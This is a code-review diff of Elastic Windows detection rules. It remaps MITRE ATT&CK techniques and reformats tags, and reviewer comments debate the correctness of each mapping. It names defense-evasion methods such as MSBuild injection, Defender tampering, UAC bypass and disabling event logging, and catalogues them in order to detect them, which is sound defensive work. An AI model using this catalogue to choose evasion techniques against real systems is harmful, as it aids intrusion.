event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.002" -name = "Disable Windows Event Logging" -reference = "https://attack.mitre.org/techniques/T1562/002/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_indirect_exec_conhost.toml b/rules/windows/defense_evasion_indirect_exec_conhost.toml index 12330d28d1f..9b8ba6a9f67 100644 --- a/rules/windows/defense_evasion_indirect_exec_conhost.toml 
+++ b/rules/windows/defense_evasion_indirect_exec_conhost.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/21" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,14 +80,13 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1202" -name = "Indirect Command Execution" -reference = "https://attack.mitre.org/techniques/T1202/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_injection_msbuild.toml b/rules/windows/defense_evasion_injection_msbuild.toml index 742f00543cf..593490f1528 100755 --- a/rules/windows/defense_evasion_injection_msbuild.toml +++ b/rules/windows/defense_evasion_injection_msbuild.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
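Review bot: Swapping `T1202` for `T1218` in the conhost rule changes the claim the rule makes, and it is not obviously an improvement: `conhost.exe` is not a T1218 sub-technique, whereas T1202 (Indirect Command Execution) is the technique under which conhost-style launchers are usually catalogued (LOLBAS lists conhost under T1202, to my knowledge). The file is still named `defense_evasion_indirect_exec_conhost.toml`, so the name and the mapping now disagree. If T1218 is intended, add a sentence to the rule description explaining the choice so the next ATT&CK review does not flip it back; otherwise restore `id = "T1202"` / `name = "Indirect Command Execution"` / `reference = "https://attack.mitre.org/techniques/T1202/"`.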
@@ -76,36 +76,26 @@ process where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" -[[rule.threat.technique]] -id = "T1127" -name = "Trusted Developer Utilities Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1127/" -[[rule.threat.technique.subtechnique]] -id = "T1127.001" -name = "MSBuild" -reference = "https://attack.mitre.org/techniques/T1127/001/" - - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml b/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml index bc19ee7efbd..f7f2e8233a2 100644 --- a/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml +++ b/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/24" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
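Review bot: The Defense Evasion entry loses `T1127.001` (MSBuild), leaving only T1055, yet this is the MSBuild-injection rule (`defense_evasion_injection_msbuild.toml`) and the hunk-header query context `process where host.os.type == "windows"` is presumably keyed on MSBuild as the injecting process — the query body is outside the hunk. Proxy execution via MSBuild is what distinguishes this rule from a generic process-injection rule, so consider keeping both techniques under TA0005 by re-adding the `T1127` / `T1127.001` tables after the T1055 block. Listing T1055 under both TA0005 and TA0004 is correct, since ATT&CK places it under both tactics.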
@@ -95,14 +95,13 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique]] +id = "T1127" +name = "Trusted Developer Utilities Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1127/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml b/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml index 6f434c174de..0801bc6399a 100644 --- a/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml +++ b/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/27" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/02/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -92,6 +92,7 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -101,12 +102,6 @@ reference = "https://attack.mitre.org/techniques/T1112/" id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" diff --git a/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml b/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml index 47bf071a3c6..bd9fa5b3fc7 100644 --- a/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml 
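Review bot: In the LSASS PPL hunk, removing `T1562.001` (Disable or Modify Tools) leaves the rule on the T1562 parent only, which makes the mapping less precise rather than more: clearing `RunAsPPL` is exactly a modification of a security control to weaken it, the case T1562.001 describes. The Microsoft Defender tampering rule later in this diff adds T1562.001 for registry changes of the same shape, so the two rules should make the same call. If the intent is that PPL is not a "tool", say so in the description; otherwise keep the `[[rule.threat.technique.subtechnique]]` block for T1562.001.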
+++ b/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/24" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -111,19 +111,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.005" -name = "Match Legitimate Resource Name or Location" -reference = "https://attack.mitre.org/techniques/T1036/005/" +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" +[[rule.threat.technique.subtechnique]] +id = "T1055.012" +name = "Process Hollowing" +reference = "https://attack.mitre.org/techniques/T1055/012/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_masquerading_business_apps_installer.toml b/rules/windows/defense_evasion_masquerading_business_apps_installer.toml index 6b6d840dfd7..0a25a153287 100644 --- a/rules/windows/defense_evasion_masquerading_business_apps_installer.toml +++ b/rules/windows/defense_evasion_masquerading_business_apps_installer.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/01" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
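Review bot: Replacing `T1036.005` with `T1055.012` (Process Hollowing) is a strong claim for a rule whose hunk-header context is a plain `process where ... event.type == "start"` match: a process-start event can show that a binary is named like the Elastic endpoint but lives in the wrong place or lacks the expected signer, which is masquerading, not hollowing (hollowing needs memory or image-mismatch telemetry). Unless the query, which is outside the hunk, inspects something hollowing-specific, keep T1036/T1036.005 and add T1055 alongside rather than instead. The file is still named `masquerading_as_elastic_endpoint_process`, which will confuse readers if the mapping no longer mentions masquerading.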
@@ -22,17 +22,7 @@ references = [ risk_score = 21 rule_id = "feafdc51-c575-4ed2-89dd-8e20badc2d6c" severity = "low" -tags = [ - "Domain: Endpoint", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Initial Access", - "Tactic: Execution", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "OS: Windows", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
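Review bot: The new single-line `tags` places `Tactic: Defense Evasion` and `Tactic: Execution` between `Domain: Endpoint` and the `Data Source:` entries, which differs from every other rule touched in this diff, where the `Tactic:` tags follow `Use Case: Threat Detection`. If the formatter orders tags this should not come out of it; if it is a hand edit, match the rest of the set: `"Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Resources: Investigation Guide"`. Dropping `Tactic: Initial Access` is consistent with the TA0001 entry removed in the next hunk.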
@@ -209,53 +199,36 @@ Business applications are integral to productivity, often downloaded and install [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.001" -name = "Invalid Code Signature" -reference = "https://attack.mitre.org/techniques/T1036/001/" [[rule.threat.technique.subtechnique]] id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1189" -name = "Drive-by Compromise" -reference = "https://attack.mitre.org/techniques/T1189/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_masquerading_communication_apps.toml b/rules/windows/defense_evasion_masquerading_communication_apps.toml index e280b7fae10..49a0ebbad28 100644 --- a/rules/windows/defense_evasion_masquerading_communication_apps.toml +++ b/rules/windows/defense_evasion_masquerading_communication_apps.toml @@ -2,7 +2,7 @@ creation_date = "2023/05/05" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
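Review bot: The threat hunk drops the `T1036.001` (Invalid Code Signature) sub-technique from the business-apps installer rule, while the sibling communication-apps rule in this same diff keeps T1036.001 alongside T1036.005. The two rules follow the same pattern (masquerading installer/app names), so if this one's query also checks `process.code_signature` — the query is outside the hunk — T1036.001 should stay; if it does not, the asymmetry is fine but worth a sentence. Removing the Initial Access `[[rule.threat]]` (T1189 Drive-by Compromise) looks right, since the rule observes execution rather than delivery.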
@@ -138,10 +138,12 @@ Communication apps are integral to modern workflows, facilitating seamless inter [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -152,22 +154,7 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1554" -name = "Compromise Host Software Binary" -reference = "https://attack.mitre.org/techniques/T1554/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml b/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml index f7808e814e3..3637fb30676 100644 --- a/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml +++ b/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/24" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
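Review bot: The Persistence `[[rule.threat]]` (T1554) is removed in the second hunk, but there is no `tags` hunk for this file in the diff, so if `tags` still carries `Tactic: Persistence` it becomes an orphan tag under the tightened tag/tactic check. The tags block is outside the hunk, so I cannot confirm from here. The mapping change itself is sound: T1554 describes modifying a legitimate binary in place, which a name-masquerading rule does not observe.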
@@ -66,20 +66,7 @@ references = [ risk_score = 47 rule_id = "ac5012b8-8da8-440b-aaaf-aedafdea2dff" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -97,48 +84,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.012" name = "Image File Execution Options Injection" reference = "https://attack.mitre.org/techniques/T1546/012/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.012" name = "Image File Execution Options Injection" reference = "https://attack.mitre.org/techniques/T1546/012/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/defense_evasion_microsoft_defender_tampering.toml b/rules/windows/defense_evasion_microsoft_defender_tampering.toml index 2b7315a7978..b79e6aecbf5 100644 --- a/rules/windows/defense_evasion_microsoft_defender_tampering.toml +++ b/rules/windows/defense_evasion_microsoft_defender_tampering.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Austin Songer"] 
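Review bot: After this hunk the rule's first `[[rule.threat]]` is TA0003 Persistence and Defense Evasion is gone from both threat and (per the previous hunk) tags, yet the file is still `rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml`. If the repository still checks that the filename prefix matches the rule's primary (first) tactic, this will fail; even if it does not, the prefix now misdescribes the rule. Either keep the TA0005/T1036 entry — a suspicious WerFault child is a masquerading signal, which is why the file is named that way — or rename the file to a `persistence_` prefix in the same PR. Across this diff the threat entries appear to be sorted alphabetically by tactic name, so "first entry" is no longer a deliberate primary-tactic choice, which is worth keeping in mind for any such check.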
@@ -140,6 +140,7 @@ registry where host.os.type == "windows" and event.type == "change" and process. [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -150,9 +151,12 @@ id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_modify_ownership_os_files.toml b/rules/windows/defense_evasion_modify_ownership_os_files.toml index 21d79ba0ec9..614c46dd467 100644 --- a/rules/windows/defense_evasion_modify_ownership_os_files.toml +++ b/rules/windows/defense_evasion_modify_ownership_os_files.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/01" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/02" +updated_date = "2026/03/23" [rule] 
@@ -58,21 +58,7 @@ Adversaries may modify file or directory ownership to evade access control lists risk_score = 47 rule_id = "7eb54028-ca72-4eb7-8185-b6864572347db" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timeline_id = "e70679c2-6cde-4510-9764-4823df18f7db" timeline_title = "Comprehensive Process Timeline" timestamp_override = "event.ingested" @@ -91,21 +77,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1222" name = "File and Directory Permissions Modification" reference = "https://attack.mitre.org/techniques/T1222/" + [[rule.threat.technique.subtechnique]] id = "T1222.001" name = "Windows File and Directory Permissions Modification" reference = "https://attack.mitre.org/techniques/T1222/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - - - diff --git a/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml b/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml index aee207a0bb1..4bb3d2cf781 100644 --- a/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml 
+++ b/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/12" integration = ["windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -103,31 +103,23 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_msiexec_remote_payload.toml b/rules/windows/defense_evasion_msiexec_remote_payload.toml index ba656ec2c14..b5e88f594ac 100644 --- a/rules/windows/defense_evasion_msiexec_remote_payload.toml +++ b/rules/windows/defense_evasion_msiexec_remote_payload.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
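Review bot: The hunk deletes the Execution `[[rule.threat]]` (T1204.002) but this file's diff has no `tags` hunk; if `tags` still lists `Tactic: Execution`, it is now an orphan under the tightened tag/tactic check, and the tags block is outside the hunk so please confirm. The T1562 / T1562.001 addition reads correctly for Office security-setting registry changes. Minor: the new `[[rule.threat.technique]]` for T1562 follows the T1112 `reference` line with no blank line while its sub-technique gets one — harmless to TOML, but inconsistent with the spacing the rest of the diff normalises to.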
@@ -62,20 +62,7 @@ MsiExec is a Windows utility for installing, maintaining, and removing software. risk_score = 73 rule_id = "c9847fe9-3bed-4e6b-b319-f9956d6dd02a" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -92,19 +79,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.007" name = "Msiexec" reference = "https://attack.mitre.org/techniques/T1218/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - 
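Review bot: The new TA0011 `[[rule.threat]]` is inserted ahead of the existing TA0005 entry, so the rule's first tactic is now Command and Control while the file remains `defense_evasion_msiexec_remote_payload.toml` and the tags list `Tactic: Defense Evasion` after the new `Tactic: Command and Control`. If the repository checks the filename prefix against the primary (first) tactic this ordering will trip it; placing the C2 entry after the Defense Evasion one avoids that and still satisfies the tag/tactic pairing. Adding T1105 itself is justified — msiexec fetching a remote package is ingress tool transfer.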
diff --git a/rules/windows/defense_evasion_network_connection_from_windows_binary.toml b/rules/windows/defense_evasion_network_connection_from_windows_binary.toml index 1d239873113..e8f3559b58b 100644 --- a/rules/windows/defense_evasion_network_connection_from_windows_binary.toml +++ b/rules/windows/defense_evasion_network_connection_from_windows_binary.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
@@ -166,34 +166,63 @@ sequence by process.entity_id with maxspan=1m
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1036"
-name = "Masquerading"
-reference = "https://attack.mitre.org/techniques/T1036/"
-[[rule.threat.technique.subtechnique]]
-id = "T1036.005"
-name = "Match Legitimate Resource Name or Location"
-reference = "https://attack.mitre.org/techniques/T1036/005/"
-
 [[rule.threat.technique]]
 id = "T1127"
 name = "Trusted Developer Utilities Proxy Execution"
 reference = "https://attack.mitre.org/techniques/T1127/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1127.001"
 name = "MSBuild"
 reference = "https://attack.mitre.org/techniques/T1127/001/"
+[[rule.threat.technique]]
+id = "T1218"
+name = "System Binary Proxy Execution"
+reference = "https://attack.mitre.org/techniques/T1218/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1218.002"
+name = "Control Panel"
+reference = "https://attack.mitre.org/techniques/T1218/002/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1218.003"
+name = "CMSTP"
+reference = "https://attack.mitre.org/techniques/T1218/003/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1218.004"
+name = "InstallUtil"
+reference = "https://attack.mitre.org/techniques/T1218/004/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1218.005"
 name = "Mshta"
 reference = "https://attack.mitre.org/techniques/T1218/005/"
+[[rule.threat.technique.subtechnique]]
+id = "T1218.007"
+name = "Msiexec"
+reference = "https://attack.mitre.org/techniques/T1218/007/"
+[[rule.threat.technique.subtechnique]]
+id = "T1218.008"
+name = "Odbcconf"
+reference = "https://attack.mitre.org/techniques/T1218/008/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1218.010"
+name = "Regsvr32"
+reference = "https://attack.mitre.org/techniques/T1218/010/"
+
+[[rule.threat.technique]]
+id = "T1220"
+name = "XSL Script Processing"
+reference = "https://attack.mitre.org/techniques/T1220/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense
Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml b/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml
index 33a09e0df4e..44d35cb942c 100644
--- a/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml
+++ b/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/11/01"
 integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/08/26"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -66,20 +66,7 @@ references = [
 risk_score = 47
 rule_id = "07b1ef73-1fde-4a49-a34a-5dd40011b076"
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Tactic: Lateral Movement",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Data Source: Sysmon",
- "Data Source: SentinelOne",
- "Data Source: Microsoft Defender for Endpoint",
- "Data Source: Crowdstrike",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
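Review bot: Blank-line separation between the technique tables is inconsistent in the rebuilt threat block of defense_evasion_network_connection_from_windows_binary.toml: the added `[[rule.threat.technique]]` for T1218 follows the T1127.001 reference with no separating line, the T1218.007 Msiexec entry runs straight into T1218.008, and the T1220 entry runs straight into `[rule.threat.tactic]`, while the other added sub-techniques each get an added blank line before them. TOML parses either way, so this is about readability and about keeping the file stable under whatever tool emitted the surrounding `+` blank lines; adding the three missing blank lines would bring the block in line with the rest of it. The same uneven spacing recurs in the posh_obfuscation*.toml and posh_high_entropy hunks, where the new `[[rule.threat.technique.subtechnique]]` for T1027.010 is appended directly after the T1027 reference and directly before `[rule.threat.tactic]`.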
@@ -105,36 +92,23 @@ registry where host.os.type == "windows" and event.type == "change" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1112"
 name = "Modify Registry"
 reference = "https://attack.mitre.org/techniques/T1112/"
 [[rule.threat.technique]]
-id = "T1562"
-name = "Impair Defenses"
-reference = "https://attack.mitre.org/techniques/T1562/"
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
+[[rule.threat.technique.subtechnique]]
+id = "T1548.002"
+name = "Bypass User Account Control"
+reference = "https://attack.mitre.org/techniques/T1548/002/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
